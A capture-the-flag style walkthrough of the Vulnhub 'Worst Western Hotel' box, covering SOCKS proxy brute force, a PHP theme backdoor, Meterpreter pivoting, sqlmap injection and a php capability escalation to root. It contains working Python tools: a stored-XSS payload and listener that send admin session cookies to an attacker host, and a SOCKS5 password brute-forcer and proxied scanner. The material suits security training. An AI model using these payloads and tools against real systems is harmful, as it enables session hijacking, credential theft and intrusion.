Vulnhub Worst Western Hotel: 1 Walkthrough!!!
This is a really good machine. It involves brute-forcing a SOCKS proxy, reaching the web app through that proxy, exploiting a stored XSS to steal the admin's session cookie, grabbing credentials from one of the images, using those credentials to log into the web app as admin and then abusing it to get RCE. Once you have the shell you realise you are inside Docker: ifconfig shows a different network. Generate a Meterpreter reverse shell payload with msfvenom, catch it with Metasploit, add a route through the Meterpreter session and start a SOCKS proxy. Then exploit a SQL injection to extract a database username and password, SSH into the box and abuse the capability set on the PHP binary to root it.
So this machine covers attack vectors like brute-forcing, XSS for session cookie theft, routing through Meterpreter, port forwarding, SOCKS proxying and SQLi. The creator did a fantastic job here. So let's begin with nmap.
Find all open ports on the box.
Service version detection using nmap.
Visiting port 80 in the browser showed "prime.worstwestern.com". Add an entry for it to the hosts file, after which the page below loads.
I ran dirb first with a few extensions (.txt, .php, .zip, etc.) and it found an interesting file, config.txt.
Opening it in the browser gave the information below.
This file points to another network and contains a username and password. The nmap scan had shown a SOCKS5 proxy on port 1080 that requires authentication; the username and password from the config file did not work there, so I used nmap's socks-brute script to brute-force the password with the username Prime.
nmap --script socks-brute --script-args userdb=/tmp/users,passdb=/usr/share/wordlists/rockyou.txt -p 1080 <IP-addr> -v
That gave a valid password: "tinkerball1". Now configure proxychains by adding the line socks5 <IP of the box> 1080 Prime tinkerball1 to its configuration file. Running nmap through proxychains against the 192.168.1.0/24 range (as a TCP connect scan with -sT -Pn, since only full TCP connections are carried through a SOCKS tunnel; SYN probes and ICMP pings are not) found the host 192.168.1.124.
Scanning 192.168.1.124 with nmap on the common ports 22, 80 and 443 gave the result below.
Opening the IP in the browser, with or without HTTPS, gives the page below.
As per the hint from the creator of the box, there might be a stored XSS in the Username field.
So we need an XSS payload that steals the session cookie, if there is one, and sends it to an attacker-controlled server; this only works because the session cookie is not flagged HttpOnly, so JavaScript can read it. I used the payload and script from this link, hosted a Python SimpleHTTPServer on Kali and submitted the payload in the username field. After a few minutes I started receiving PHP session cookies.
I reused the PHP session cookie and got access to the page hosted on 192.168.1.124.
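As an added example (my own code, not the payload or script the author took from that link), here is the cookie-stealing side of the stored XSS in Python: a listener that logs whatever the victim's browser sends and the matching payload for the username field. The listener address 10.0.0.1:8000 is an assumption, as is the idea that the admin's browser can reach it; the cookie values used to exercise the parser are constructed.

```python
"""Stored-XSS session theft: a payload that makes the victim's browser load an
'image' from our listener with document.cookie in the query string, and the
listener that records what arrives. The victim is whoever renders the stored
username, here the admin, so the cookie belongs to their session."""
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit


def build_payload(listener_url):
    """The <script> to submit as the username. json.dumps yields a safe JS string
    literal for the URL; encodeURIComponent keeps ';' and '=' intact in transit."""
    return (
        "<script>new Image().src=%s+'?c='+encodeURIComponent(document.cookie);</script>"
        % json.dumps(listener_url)
    )


def extract_cookies(request_path):
    """'/?c=PHPSESSID%3Dabc%3B%20theme%3Ddark' -> {'PHPSESSID': 'abc', 'theme': 'dark'}.
    Paths without a c= parameter (favicon requests, scanners) give {}."""
    raw = parse_qs(urlsplit(request_path).query).get("c", [""])[0]
    cookies = {}
    for part in raw.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies


class CookieCatcher(BaseHTTPRequestHandler):
    """Answers every GET with a 1x1 GIF, so the image load completes quietly,
    and prints the cookies carried in the query string."""
    GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff!\xf9\x04"
           b"\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")

    def do_GET(self):
        cookies = extract_cookies(self.path)
        if cookies:
            print("[+] %s sent cookies: %s" % (self.client_address[0], cookies))
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(self.GIF)))
        self.end_headers()
        self.wfile.write(self.GIF)

    def log_message(self, fmt, *args):  # keep stdout to the cookie lines only
        pass


if __name__ == "__main__":
    LISTENER = "http://10.0.0.1:8000"  # assumed attacker address, reachable from the admin's browser
    print("Submit this as the username:\n" + build_payload(LISTENER))
    HTTPServer(("0.0.0.0", 8000), CookieCatcher).serve_forever()
```

Once a PHPSESSID arrives, set it as the Cookie header on requests to 192.168.1.124 (run the client under proxychains so it goes through the SOCKS proxy) and the app treats you as the admin until that session expires or is invalidated.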
The website displays what look like camera images, and the one below contains very interesting information.
The image contains a username and password [peterg:Birdistheword]. I scanned the original IP address of the box with dirb again and got the result below.
It found adminpanel.
I used the above credentials to log into the web application.
Here I spent a lot of time trying to figure out how to exploit this app. I contacted the creator of the box and he told me we need to upload a theme with a PHP backdoor in it. The web application has a function to download the current theme.
Navigate to Preferences → Themes and click Export theme. Once it has downloaded, open hotel-reservation-theme/lang/index.php inside the theme and add the PHP backdoor to it.
Create a .zip file from the modified theme and upload it: navigate to Preferences → Themes → Add New Theme and upload the .zip file.
Now browse to /themes/name-of-your-theme/lang/index.php?cmd=id and we have RCE.
I used a Python reverse shell payload to get a shell.
But if you look closely, we are in another network, 192.168.0.0/24. At this point I used an msfvenom payload and Metasploit to get a Meterpreter shell.
I generated a Meterpreter reverse shell payload with msfvenom and downloaded it onto the box.
I started Metasploit, used exploit/multi/handler with the payload linux/x64/meterpreter/reverse_tcp and ran it. Executing the payload file on the victim gave me a Meterpreter shell.
Since we need to scan the new network through Meterpreter, I added a route for 192.168.0.0/24 via the session and started Metasploit's SOCKS proxy server. I also added an entry for 127.0.0.1 1080 to the proxychains configuration file, in place of the earlier entry for the box's own proxy (proxychains chains through every listed proxy in order by default, so leaving both lines active would push the traffic through both).
Using nmap through the proxy to scan 192.168.0.0/24 found 192.168.0.1 up. Scanning it on the common ports 22, 80 and 443 gave the results below.
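An added example, not from the write-up, that covers two of the steps above in one piece of Python: the SOCKS5 password guessing that nmap's socks-brute performed against port 1080 earlier, and the TCP connect scan of an internal range through a SOCKS proxy, whether the box's authenticated one or Metasploit's unauthenticated one on 127.0.0.1:1080. The box address 10.0.0.5 and the wordlist path are assumptions.

```python
"""SOCKS5 client helpers (RFC 1928 wire format, RFC 1929 username/password
auth): guess the password of an authenticated SOCKS5 service, then run a TCP
connect scan of an internal range through a SOCKS proxy."""
import socket
import struct

VER, NO_AUTH, USERPASS, NO_ACCEPTABLE = 0x05, 0x00, 0x02, 0xFF


def greeting(methods):
    """Client greeting: VER | NMETHODS | METHODS."""
    return bytes([VER, len(methods)]) + bytes(methods)


def parse_method_choice(data):
    """Auth method the proxy picked; raise if it rejected everything offered."""
    if len(data) != 2 or data[0] != VER:
        raise ValueError("not a SOCKS5 method selection: %r" % data)
    if data[1] == NO_ACCEPTABLE:
        raise ValueError("proxy accepts none of the offered auth methods")
    return data[1]


def userpass_request(username, password):
    """RFC 1929 subnegotiation: VER(0x01) | ULEN | UNAME | PLEN | PASSWD.
    bytes() raises ValueError if either field exceeds the one-byte length."""
    u, p = username.encode(), password.encode()
    return bytes([0x01, len(u)]) + u + bytes([len(p)]) + p


def userpass_ok(data):
    """RFC 1929 reply: VER(0x01) | STATUS, where STATUS 0x00 means accepted."""
    return len(data) == 2 and data[0] == 0x01 and data[1] == 0x00


def connect_request(host, port):
    """CONNECT request: ATYP 0x01 for an IPv4 literal, 0x03 for a hostname."""
    try:
        addr = b"\x01" + socket.inet_aton(host)
    except OSError:
        addr = b"\x03" + bytes([len(host)]) + host.encode()
    return bytes([VER, 0x01, 0x00]) + addr + struct.pack("!H", port)


def parse_connect_reply(data):
    """REP code of the CONNECT reply: 0x00 succeeded, 0x05 connection refused."""
    if len(data) < 2 or data[0] != VER:
        raise ValueError("not a SOCKS5 reply: %r" % data)
    return data[1]


def _recv_exact(sock, n):
    """Read exactly n bytes; a short read means the proxy hung up, and the parsers raise."""
    return sock.makefile("rb").read(n)


def socks5_handshake(proxy, username=None, password=None, timeout=5.0):
    """Connect to the proxy and authenticate; returns a socket ready for CONNECT."""
    sock = socket.create_connection(proxy, timeout=timeout)
    sock.sendall(greeting([USERPASS] if username is not None else [NO_AUTH]))
    if parse_method_choice(_recv_exact(sock, 2)) == USERPASS:
        sock.sendall(userpass_request(username, password))
        if not userpass_ok(_recv_exact(sock, 2)):
            sock.close()
            raise PermissionError("SOCKS5 credentials rejected")
    return sock


def check_credentials(proxy, username, password):
    """True when the proxy accepts the pair; any error counts as a miss."""
    try:
        socks5_handshake(proxy, username, password).close()
        return True
    except (PermissionError, ValueError, OSError):
        return False


def brute_force(proxy, username, wordlist_path):
    """Return the first wordlist line the proxy accepts as username's password."""
    with open(wordlist_path, encoding="latin-1") as fh:
        for line in fh:
            candidate = line.rstrip("\r\n")
            if check_credentials(proxy, username, candidate):
                return candidate
    return None


def scan_via_socks(proxy, target, ports, username=None, password=None):
    """TCP connect scan through the proxy: the REP field says whether the proxy
    reached the port. Only full connects traverse SOCKS, hence nmap -sT -Pn."""
    open_ports = []
    for port in ports:
        try:
            sock = socks5_handshake(proxy, username, password)
            sock.sendall(connect_request(target, port))
            rep = parse_connect_reply(_recv_exact(sock, 4))  # VER REP RSV ATYP
            sock.close()
            if rep == 0x00:
                open_ports.append(port)
        except (PermissionError, ValueError, OSError):
            continue
    return open_ports


if __name__ == "__main__":
    BOX = ("10.0.0.5", 1080)  # assumed address of the box on the attacker's network
    pw = brute_force(BOX, "Prime", "/usr/share/wordlists/rockyou.txt")
    if pw:
        print(pw, scan_via_socks(BOX, "192.168.1.124", [22, 80, 443], "Prime", pw))
```

For the second pivot, call scan_via_socks(("127.0.0.1", 1080), "192.168.0.1", [22, 80, 443]) with no credentials once the route and Metasploit's SOCKS server are up. One connection per guess is what makes SOCKS brute force slow and noisy; a proxy that logs failed authentications will show every attempt.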
Visiting 192.168.0.1 in the browser redirects to crm.worstwestern.com, so you need to add it to the hosts file. That was not working for me, so I used portfwd in Meterpreter to forward localhost:443 to 192.168.0.1:443. It has the page below.
Both of the pages above are vulnerable to SQLi. I captured the POST request of the Forgot Password page to a file and used sqlmap to retrieve the data.
To list the databases, I used the command below.
sudo sqlmap -r localhost_forget_pass --force-ssl --dbms mysql --dbs
So we have the crm database. Next, enumerate its tables:
sudo sqlmap -r localhost_forget_pass --force-ssl --dbms mysql -D crm --tables
Then I dumped the user table.
sudo sqlmap -r localhost_forget_pass --force-ssl --dbms mysql -D crm -T user --dump
The table has a different password for peterg; let's use it for SSH.
I added another port forward to access port 22.
Using the username peterg and the password TheBirdIsTheWord I SSHed into the box, and we are peterg now.
I uploaded linpeas.sh to the box and ran it. Below are the binaries with capabilities.
GTFOBins shows the result below for the php capabilities entry: when the php binary carries cap_setuid, a one-liner that calls posix_setuid(0) and then spawns /bin/sh runs that shell as root.
And we are root…
So that's it, a really great machine and I enjoyed it a lot. I hope you enjoy the write-up. Thanks for reading.